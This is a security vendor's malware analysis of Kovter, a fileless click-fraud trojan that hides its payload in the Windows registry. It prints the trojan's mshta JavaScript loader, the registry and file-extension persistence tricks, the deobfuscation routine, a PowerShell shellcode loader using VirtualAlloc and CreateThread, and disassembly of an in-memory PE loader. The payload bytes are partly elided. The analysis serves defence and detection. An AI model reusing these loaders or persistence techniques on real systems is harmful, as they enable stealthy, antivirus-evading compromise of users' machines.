29/09/2016
08:53

Kovter: malware that propagates without creating files

Kovter is malware classified as "Fileless", malware is not stored on file but on the Windows registry.
A few weeks ago we found a malware infection called Kovter.

Kovter is a malware classified as "Fileless", this malware is not stored into file but in the Windows's registry.
This particular technique has already been implemented since 2014 from Trojan.Poweliks.

Kovter began to spread from 2013 and it subsequently evolved up to the latest version today.


How Kovter starts running


Kovter uses two methods to automatically run:
  • puts running on the Start menu a link with random name: %user%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<random>.lnk
  • change the registry key:  HKCU\..\Run in order to run a link with random name

Link on the autorun start menu

The link on the autorun start menu automatically executes the following files:

C:\WINDOWS\system32\mshta.exe "javascript:x6uokfa="1H4Iy4";i4f=new ActiveXObject("WScript.Shell");k1GFd="Lo";eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix"); Cax4C="j";eval(eB38vo);wUtAao9="taH";"

The mshta.exe file is a legitimate Windows program that runs passing it as a parameter from JavaScript code:


x6uokfa="1H4Iy4";

i4f=new ActiveXObject("WScript.Shell");

k1GFd="Lo";

eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix");

Cax4C="j";

eval(eB38vo);

wUtAao9="taH";

The script reads the contents of the key " HKCU\software\hpkxvramhp\hjmyqgix" and run it through the command "eval".


Modifying the Key HKCU\..\Run

Kovter adds the following value in the registry key HKCU\..\Run:

[*random] = %user%\AppData\Local\<random>\<random>.lnk

example: C:\Users\<user>\AppData\Local\437680\20c820.lnk

The entry [*random] contains a char that does not allow to be read by Regedit utility, which will display the following error message:



The link randomly named runs a batch file, also randomly named, stored in the same folder, eg:

%user%\AppData\Local\437680\1f41aa.bat

The batch file (1f41aa.bat) randomly named running the following command:

start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

The command "start" runs the file passed as a parameter, which in our case is d3d9d7.da511ec
As you can see this file it does not have a known extension as .exe, but Windows considers this extension as "executable".


Here Kovter uses a trick by registering the extension ".da511ec" so that Windows recognizes it.
In fact it adds in the registry the keys:

[HKEY_CLASSES_ROOT\.da511ec]
@="eb4832"

[HKEY_CLASSES_ROOT\eb4832\shell\open\command]
@="\"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\";joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""

Adding these keys allows to open files with extension ".da511ec" by using the mshta.exe program passing it as a parameter the malicious JavaScript code.

So running the command:
start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

actually executes:
"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\";joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Kovter uses two methods to execute its Javascript code.



The analysis of stored script in "HKCU\software\hpkxvramhp\hjmyqgix"


Here we can see the registry key Kovter randomly named HKCU\software\hpkxvramhp:


The script stored in the key " HKCU\software\hpkxvramhp\hjmyqgix" is obfuscated:


ZkiWOtZypMULIBG9qrrD="2nzAtBJtgQYLrRLzrg2TdDm0fTwtN7Ic";
O7PlR5uFSdkPYNrjZhe="DkVifljAd1IPcr5vGPfUtx";
Fohg1ujfWzRyMiXFRcneWxW4="MKXKSj6SJMRSTdQTadNQEmS8ph2NRmgTFJb";
mQfOBK6yjvxYdLNRIGFfGvPw="HZb12ww55xVi1rBXcDPK95PrI9qzNAD6rSFcqagM";
vrRHp0KKrR7ZveKiknDcYK="KGmNljtpOoPLKCThFcqwNQ5yXDsDE2g5hqFL7AkUlg";
lBMX2IP5hjeQCLgHmzbTKmdBo="r26TebqQPsyzVtodCaqe2oPCzirFM2W9sosS";

HjU2="180A4E020B1B373F222D2411191D1926331A380A [..] 9360F1E6850";

ATLaipjOWiJDbQAznVbD9jL="iFl6LyFIHQLkuiwxaH";
DvkCSeJGKXTu5nzfFmzvygFH="Byo15vi5zPcqS2qFTJOctr9wokbdJqpI";
PtExHAoHmpKvm6LfGgh="hWIWb1gtI4ERmSg9jd09";
lmkxbKzuBahY68nRzBrKRmUS="ryLa69HSi7AQfpKXvmgR2Vkeb1BjFDJUPx";

wdQ3co="";
for(kmzTk7ch=0;kmzTk7ch<HjU2.length;kmzTk7ch+=2)
    wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(kmzTk7ch,2),16));
   
ydvrOaLz2HZcnCYYkaj="wTIXNVLV60c5UDugog5qb";
PaPL8mXPEMyhvkf7VeyMdTR="JV4zU6NghDkk91qEK9u9htejMug2O7su";
RAGiRQTTVmMZ83FhbgjyIxAE="Wmo9xzd5h4K2aNyyLQhPdVYJKDTbBem3tt5ysnCzx";
wBYGstBJNlcvNcWCa9="15MCvunOq3VJS4gx825XBJifrvISFcZtvfmamrUWCDtlRd";
OmtaJnSPjpe4pXLYbBF2="oYeGuiuo1wQsYxaZoOpe1NM8y9xwNgXZajkK78H";
JYVks3AYUzeCFJIWfkUPE="4hg7sxnxB6NsncATOG";
YSzOYZNYXNkqN2WJvTHv="YkDbFfePrjt6HId2b4AswRtW";
ljxEXRUIo0Qjpmwr1nMN="ctK3nnLWU4djCYIymXrHLYSFIrUxU3eH";
evgsfov21ZJ="lhvSYvRVpGGvHIxSdRanhtd6gXeHJN4IdBXsrtPBEO17ZGOuDVEj6AkR75izW";

gKTiCbtkFl5a="";
for(NLhDZDUIcZn5XE=kkAphRRJTody9D0lR=0;kkAphRRJTody9D0lR<wdQ3co.length;kkAphRRJTody9D0lR++)
{
    gKTiCbtkFl5a+=String.fromCharCode(wdQ3co.substr(kkAphRRJTody9D0lR,1). \
    charCodeAt()^evgsfov21ZJ.substr(NLhDZDUIcZn5XE,1).charCodeAt());

    NLhDZDUIcZn5XE=(NLhDZDUIcZn5XE<evgsfov21ZJ.length-1)?NLhDZDUIcZn5XE+1:0;
}

ZABLXRQGMq09SljWiVtr="9JKsvjk4P2Ll2Jwz83tmlOVk9mOKBug2bb9p9UDjD";
loSSXayazxvyKP9ewHZw1Lk="lPHxkgl55EwVP5Tpg9cAeFq2";
IAREsOdQtRxh2QjeyYVsws="YfO26CzYlcPCVUjrT48uK36KKOetSxTdY0PwkkLMfqK";
FcXnrjQSGhP1IIGEROKDPDh="f0zkcSKM4h0YaVGzvNJV";
qMyKeAMydCiC1VeFxewzqcwF="JoknyqQX1e8hQfFlDr";
Bu0tWsiVrAbCnBrrQgfco="H80AX2ztfx6kgQ1qbjKNc";

eval(gKTiCbtkFl5a);

MqslAVCZqdnNTFKpuJd7y="3fAmC1pt9tag38olxxXk";
SmUxB5WxYzMXGe7xkTaa="xAQ0ZR16dmiaDcB0nIp1tDTnh0DaEuJs4vu7Pzx937Kb";
fPjxGMkXi2A1yeboAoFzYuFi="i3UxxPkQ1TAYNURKdCb8XflpjQ7sCSjzJJ";
CwjNpyGMjcktWTbjF5EVDD="WSaorKEaleV0u7wrLfc8DN";
zeQ5DhYtR0dvZFkzBuTE="5nrYPt5gTHfW2Qhtvi8mzRt";
YUyBjQEh1bynUrzllDaEg="t5ubP6o1E29LKwk4AE4SlJg";


After de-obfuscated script we get into the variable gKTiCbtkFl5a the following code:

tb8QRmeiRjcgQTauWHYd="tFg0e3aPTMijrBS8VYUeg9OTT7w7v2qY8hW16zb2vrN6";
scFiLQBmpVrejk7LOJD="Kc8JS7vM7zJPVjhs6lazVbRXBfgiU7oEFu1Axr";
FwRki5kymuSHEg5pnbPViUBt="oumMQgDIjMtmH6lH1bkK4ZsGpO2ryzZ04IFQ79";
JwFVDCBaEReTikqFfEsYr93P="9H9y6PG2sZeu7OWisk36UtQ";
qpidwGNUkfftJr4pcxHdShzv="vCDAdk54adDpeNAfrJHwY8RE4ZpWrLwFbRufEd2JbI";
zAoJE3XKRMQbBvUuQv4="T46t3bKeodHAmla488ompKrwPwTn";
UScSggymSrjTDXFe2J0qR="WJqcZB6w4HCiAUegDXAJdNKVj3yZpQzRgt0o";
WeSxn5UshbIhExFjzg="zJ6l0g7MdLYp1aLvlRh0pujqcRqfsYTg93psVCzx18BHZye";

try {
    moveTo(-100,-100);
    resizeTo(0,0);
    c9Z=new ActiveXObject("WScript.Shell");
    (c9Z.Environment("Process"))("xcly")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('c2xlZXAoNDApO3Rye [...] leGl0Ow==')))"
    aA0g0r=c9Z.Run("C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:xcly",0,1)
}
catch(e){}close();


This script runs the program "powershell.exe" with the variable as parameter "iex" containing the code to execute.
"iex" is obfuscated in Base64, after de-obfuscated we get:


sleep(40);
try {
    function gdelegate    {
        Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
       
        $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System. [..];
        $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public", [..] ");
        $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual", [..] ");
        return $TypeBuilder.CreateType();
    }
   
    function gproc {
        Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
       
        $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
        $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
        return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@( [..] );
    }
   
   
    [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF, [...] , 0xE6,0xED,0xB3;
    [Uint32[]] $op=0;
   
    $r=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualProtect),(gdelegate @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($sc32,$sc32.Length,0x40,$op);
   
    if($r -eq 0) {
        $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
       
        if($pr -ne 0) {
            $memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
           
            for ($i=0;$i -le ($sc32.Length-1);$i++) {
                $memset.Invoke(($pr+$i), $sc32[$i], 1)
            };
            ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
        }
    }
    else {
        ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[Byte[]],[Byte[]],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$sc32,$sc32,0,0);
    }
    sleep(1200);
}
catch{}exit;

PowerShell code of Kovter performs the following operations:
  • The array $sc32 is set with the machine code instructions: 0x55,0x8B,0xEC,0x81 etc
  • Calls the API VirtualProtect onto array $sc32, if the operation is successful then creates a thread (CreateThread) where the entry point of the thread is the array $sc32.
  • if the previous VirtualProtect operation fails then stores a memory buffer with VirtualAlloc and copies the array  $sc32 (with memset) into stored buffer, after that creates a thread (CreateThread) where the entry point carries to the address of allocated memory buffer.

Let's see what the thread created by Kovter does:


seg000:00000000                 push    ebp
seg000:00000001                 mov     ebp, esp
seg000:00000003                 add     esp, 0FFFFFA00h
seg000:00000009                 push    ebx
seg000:0000000A                 push    esi
seg000:0000000B                 push    edi
seg000:0000000C                 push    ebx
seg000:0000000D                 push    esi
seg000:0000000E                 push    edi
seg000:0000000F                 cld
seg000:00000010                 xor     edx, edx
seg000:00000012                 mov     edx, fs:[edx+30h]
seg000:00000016                 mov     edx, [edx+0Ch]
seg000:00000019                 mov     edx, [edx+14h]
seg000:0000001C

[..]

seg000:0000004A                 mov     [ebp-2Ch], eax
seg000:0000004D                 mov     eax, [ebp-2Ch]
seg000:00000050                 cmp     word ptr [eax], 'ZM'
seg000:00000055                 jnz     loc_400026A
seg000:0000005B                 mov     eax, [ebp-4]
seg000:0000005E                 xor     edx, edx
seg000:00000060                 push    edx
seg000:00000061                 push    eax
seg000:00000062                 mov     eax, [ebp-2Ch]
seg000:00000065                 mov     eax, [eax+3Ch]
seg000:00000068                 cdq
seg000:00000069                 add     eax, [esp]
seg000:0000006C                 adc     edx, [esp+4]
seg000:00000070                 add     esp, 8
seg000:00000073                 mov     [ebp-30h], eax
seg000:00000076                 mov     eax, [ebp-30h]
seg000:00000079                 cmp     dword ptr [eax], 'EP'
seg000:0000007F                 jnz     loc_400026A
seg000:00000085                 mov     eax, [ebp-30h]

[..]

seg000:000000D5                 add     ecx, [ebp-4]
seg000:000000D8                 cmp     dword ptr [ecx], 'daoL'
seg000:000000DE                 jnz     short loc_4000136
seg000:000000E0                 lea     eax, [ecx+4]
seg000:000000E3                 cmp     dword ptr [eax], 'rbiL'
seg000:000000E9                 jnz     short loc_4000136
seg000:000000EB                 lea     eax, [ecx+8]
seg000:000000EE                 cmp     dword ptr [eax], 'Ayra'
seg000:000000F4                 jnz     short loc_4000136
seg000:000000F6                 lea     eax, [ecx+0Ch]
seg000:000000F9                 cmp     byte ptr [eax], 0
seg000:000000FC                 jnz     short loc_4000136
seg000:000000FE                 mov     eax, [ebp-34h]
seg000:00000101                 mov     eax, [eax+24h]
seg000:00000104                 add     eax, [ebp-4]
seg000:00000107                 xor     edx, edx
seg000:00000109                 push    edx
seg000:0000010A                 push    eax
seg000:0000010B                 mov     eax, esi
seg000:0000010D                 add     eax, eax
seg000:0000010F                 cdq
seg000:00000110                 add     eax, [esp]
seg000:00000113                 adc     edx, [esp+4]
seg000:00000117                 add     esp, 8
seg000:0000011A                 mov     ax, [eax]
seg000:0000011D                 mov     edx, [ebp-34h]
seg000:00000120                 mov     edx, [edx+1Ch]
seg000:00000123                 add     edx, [ebp-4]
seg000:00000126                 movzx   eax, ax
seg000:00000129                 shl     eax, 2
seg000:0000012C                 add     edx, eax
seg000:0000012E                 mov     eax, [edx]
seg000:00000130                 add     eax, [ebp-4]
seg000:00000133
seg000:00000133 loc_4000133:
seg000:00000133                 mov     [LoadLibraryA], eax   ;[ebp-44h]
seg000:00000136
seg000:00000136 loc_4000136:                            ; CODE XREF: seg000:000000DEj
seg000:00000136                                         ; seg000:000000E9j ...
seg000:00000136                 cmp     dword ptr [ecx], 'PteG'
seg000:0000013C                 jnz     short loc_4000194
seg000:0000013E                 lea     eax, [ecx+4]
seg000:00000141                 cmp     dword ptr [eax], 'Acor'
seg000:00000147                 jnz     short loc_4000194
seg000:00000149                 lea     eax, [ecx+8]
seg000:0000014C                 cmp     dword ptr [eax], 'erdd'
seg000:00000152                 jnz     short loc_4000194
seg000:00000154                 lea     eax, [ecx+0Eh]

[..]

seg000:0000018E                 add     eax, [ebp-4]
seg000:00000191                 mov     [GetProcAddress], eax  ; [ebp-48h]
seg000:00000194
seg000:00000194 loc_4000194:                            ; CODE XREF: seg000:0000013Cj
seg000:00000194                                         ; seg000:00000147j ...
seg000:00000194                 cmp     dword ptr [ecx], 'triV'
seg000:0000019A                 jnz     short loc_40001F2
seg000:0000019C                 lea     eax, [ecx+4]
seg000:0000019F                 cmp     dword ptr [eax], 'Alau'
seg000:000001A5                 jnz     short loc_40001F2
seg000:000001A7                 lea     eax, [ecx+8]
seg000:000001AA                 cmp     dword ptr [eax], 'coll'
seg000:000001B0                 jnz     short loc_40001F2

[..]

seg000:000001EA                 mov     eax, [edx]
seg000:000001EC                 add     eax, [ebp-4]
seg000:000001EF                 mov     [VirtualAlloc], eax  ; [ebp-58h]

[..]

seg000:0000026A                 mov     byte ptr [ebp-0D1h], 61h ; 'a'
seg000:00000271                 mov     byte ptr [ebp-0D0h], 64h ; 'd'
seg000:00000278                 mov     byte ptr [ebp-0CFh], 76h ; 'v'
seg000:0000027F                 mov     byte ptr [ebp-0CEh], 61h ; 'a'
seg000:00000286                 mov     byte ptr [ebp-0CDh], 70h ; 'p'
seg000:0000028D                 mov     byte ptr [ebp-0CCh], 69h ; 'i'
seg000:00000294                 mov     byte ptr [ebp-0CBh], 33h ; '3'
seg000:0000029B                 mov     byte ptr [ebp-0CAh], 32h ; '2'
seg000:000002A2                 mov     byte ptr [ebp-0C9h], 2Eh ; '.'
seg000:000002A9                 mov     byte ptr [ebp-0C8h], 64h ; 'd'
seg000:000002B0                 mov     byte ptr [ebp-0C7h], 6Ch ; 'l'
seg000:000002B7                 mov     byte ptr [ebp-0C6h], 6Ch ; 'l'
seg000:000002BE                 mov     byte ptr [ebp-0C5h], 0
seg000:000002C5                 lea     eax, [ebp-0D1h]
seg000:000002CB                 push    eax
seg000:000002CC                 call    dword ptr [LoadLibraryA]

[..]

seg000:00000364                 cmp     dword ptr [ecx], 'OgeR'
seg000:0000036A                 jnz     short loc_40003C7
seg000:0000036C                 lea     eax, [ecx+4]
seg000:0000036F                 cmp     dword ptr [eax], 'Knep'
seg000:00000375                 jnz     short loc_40003C7
seg000:00000377                 lea     eax, [ecx+8]
seg000:0000037A                 cmp     dword ptr [eax], 'xEye'
seg000:00000380                 jnz     short loc_40003C7

[..]

seg000:000003C4                 mov     [RegOpenKeyEx], eax   ; [ebp-50h]
seg000:000003C7                 cmp     dword ptr [ecx], 'QgeR'
seg000:000003CD                 jnz     short loc_400042D
seg000:000003CF                 lea     eax, [ecx+4]
seg000:000003D2                 cmp     dword ptr [eax], 'yreu'
seg000:000003D8                 jnz     short loc_400042D
seg000:000003DA                 lea     eax, [ecx+8]
seg000:000003DD                 cmp     dword ptr [eax], 'ulaV'
seg000:000003E3                 jnz     short loc_400042D
seg000:000003E5                 lea     eax, [ecx+0Ch]
seg000:000003E8                 cmp     dword ptr [eax], 'AxEe'

[..]

seg000:0000042A                 mov     [RegQueryValueEx], eax  ; [ebp-54h]

[..]

seg000:0000043A                 mov     eax, [ebp+8]
seg000:0000043D                 add     eax, 0A48h            ; 'software\hpkxvramhp',0
seg000:00000442                 mov     [ebp-84h], eax
seg000:00000448                 mov     eax, [ebp-84h]
seg000:0000044E                 add     eax, 0E4h ; 'õ'        ; eax = 0xb2c
seg000:00000453                 mov     [0xb2c], eax    ; [ebp-88h]
seg000:00000459                 xor     ebx, ebx
seg000:0000045B                 xor     eax, eax
seg000:0000045D                 mov     [ebp-9Ch], eax ; = 0
seg000:00000463                 xor     eax, eax
seg000:00000465                 mov     [ebp-0A0h], eax ; = 0
seg000:0000046B                 lea     eax, [ebp-90h]
seg000:00000471                 push    eax
seg000:00000472                 push    1
seg000:00000474                 push    0
seg000:00000476                 mov     eax, [ebp-84h]
seg000:0000047C                 push    eax
seg000:0000047D                 push    80000002h
seg000:00000482                 call    dword ptr [RegOpenKeyEx]
seg000:00000485                 test    eax, eax
seg000:00000487                 jnz     loc_4000513
seg000:0000048D                 lea     eax, [ebp-0A0h]
seg000:00000493                 push    eax
seg000:00000494                 push    0
seg000:00000496                 lea     eax, [ebp-94h]
seg000:0000049C                 push    eax
seg000:0000049D                 push    0
seg000:0000049F                 mov     eax, [ebp-84h]  ;  'software\hpkxvramhp',0
seg000:000004A5                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:000004A8                 push    eax
seg000:000004A9                 mov     eax, [ebp-90h]
seg000:000004AF                 push    eax
seg000:000004B0                 call    dword ptr [RegQueryValueEx]
seg000:000004B3                 test    eax, eax
seg000:000004B5                 jnz     short loc_4000513
seg000:000004B7                 cmp     dword ptr [ebp-0A0h], 64h ; 'd'
seg000:000004BE                 jbe     short loc_4000513
seg000:000004C0                 push    40h ; '@'
seg000:000004C2                 push    3000h
seg000:000004C7                 mov     eax, [ebp-0A0h]
seg000:000004CD                 push    eax
seg000:000004CE                 push    0
seg000:000004D0                 call    dword ptr [VirtualAlloc]  
seg000:000004D3                 mov     [ebp-9Ch], eax       
seg000:000004D9                 cmp     dword ptr [ebp-9Ch], 0
seg000:000004E0                 jz      short loc_4000513
seg000:000004E2                 lea     eax, [ebp-0A0h]
seg000:000004E8                 push    eax
seg000:000004E9                 mov     eax, [ebp-9Ch]
seg000:000004EF                 push    eax
seg000:000004F0                 lea     eax, [ebp-94h]
seg000:000004F6                 push    eax
seg000:000004F7                 push    0
seg000:000004F9                 mov     eax, [ebp-84h]
seg000:000004FF                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:00000502                 push    eax
seg000:00000503                 mov     eax, [ebp-90h]  ; hkey
seg000:00000509                 push    eax
seg000:0000050A                 call    dword ptr [RegQueryValueEx] 

[..]

seg000:00000A20                 mov     eax, [ebp-30h]
seg000:00000A23                 mov     eax, [eax+28h]   ; entry point del file
seg000:00000A26                 add     eax, [ebp-8]
seg000:00000A29                 mov     [ebp-0Ch], eax  : image + entrypoint
seg000:00000A2C                 xor     eax, eax
seg000:00000A2E                 push    eax
seg000:00000A2F                 push    1
seg000:00000A31                 push    dword ptr [ebp-8]  
seg000:00000A34                 call    dword ptr [ebp-0Ch] ; salta all'entry point
seg000:00000A37
seg000:00000A37 loc_4000A37:                            ; CODE XREF: seg000:00000757j
seg000:00000A37                                         ; seg000:00000775j ...
seg000:00000A37                 push    0
seg000:00000A39                 call    dword ptr [ExitProcess]
seg000:00000A3C                 pop     edi
seg000:00000A3D                 pop     esi
seg000:00000A3E                 pop     ebx
seg000:00000A3F                 mov     esp, ebp
seg000:00000A41                 pop     ebp
seg000:00000A42                 retn    4

[..]
seg000:00000A48 aSoftwareHpkxvr db 'software\hpkxvramhp',0
[..]
seg000:00000A89 aJpmyhhqq       db 'jpmyhhqq',0
[..]
seg000:00000B2C                 push    ebp
seg000:00000B2D                 mov     ebp, esp
seg000:00000B2F                 pusha
seg000:00000B30
seg000:00000B30 loc_4000B30:
seg000:00000B30                 mov     edi, [ebp+8]
seg000:00000B33                 mov     esi, [ebp+0Ch]
seg000:00000B36                 mov     ecx, [ebp+10h]
seg000:00000B39                 rep movsb
seg000:00000B3B                 popa
seg000:00000B3C                 pop     ebp
seg000:00000B3D                 retn    0Ch
[..]


The machine code of the thread Kovter performs the following operations:
  • Retrieve the API addresses LoadLibrary, GetProcAddress, VirtualAlloc, RegOpenkeyEx, RegQueryValueEx
  • Reads the Registry key HKCU\software\hpkxvramhp [jpmyhhqq] in a stored memory buffer using VirtualAlloc
  • The contents of the key HKCU\software\hpkxvramhp [jpmyhhqq] it is encrypted, after decrypted it checks if its content is an executable file (MZ)
  • After a series of operations to rebuild the executable file into memory, it runs its code by calling his EntryPoint

Final thoughts

Kovter-click fraud is a trojan which uses different levels of obfuscation (JavaScript, PowerShell, machine code) and "Fileless" techniques, so as to not be intercepted during the antivirus scan disk. The content of the viral code Kovter is contained on the Windows registry in the key HKCU \ Software randomly named.

This malware leaves some traces on the disk, they are the .lnk files that are used to automatically run it (through the Start menu, and the registry key HKCU\..\Run). Moreover, the reading of the registry key HKCU\..\Run with Regedit reports an error, which can alert the user the presence of this malware.
 

Author: Engineer Gianfranco Tonello

Back to top

Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: